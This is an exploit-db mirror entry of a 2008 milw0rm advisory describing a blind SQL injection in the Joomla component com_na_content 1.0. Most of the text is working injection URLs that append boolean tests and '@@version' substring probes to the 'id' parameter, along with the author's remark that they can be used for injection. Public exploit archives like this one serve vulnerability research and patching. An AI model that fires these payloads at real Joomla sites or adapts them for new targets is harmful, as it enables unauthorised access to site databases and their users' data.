exploit-db-mirror/exploits/php/webapps/7612.txt
Offensive Security 36c084c351 DB: 2021-09-03
45419 changes to exploits/shellcodes

2 new exploits/shellcodes

Too many to list!
2021-09-03 13:39:06 +00:00

15 lines
No EOL
478 B
Text

Joomla Component com_na_content 1.0 Blind SQL Injection Vuln
Author: xoron
Exploit: /index.php?option=com_na_content&task=view&id=1 having 1=0
/index.php?option=com_na_content&task=view&id=1 having 1=1
or
/index.php?option=com_na_content&task=view&id=1 and substring(@@version,1,1)=4
/index.php?option=com_na_content&task=view&id=1 and substring(@@version,1,1)=5
!! You can use this for inj.
!! Thans for Ozan!
# milw0rm.com [2008-12-29]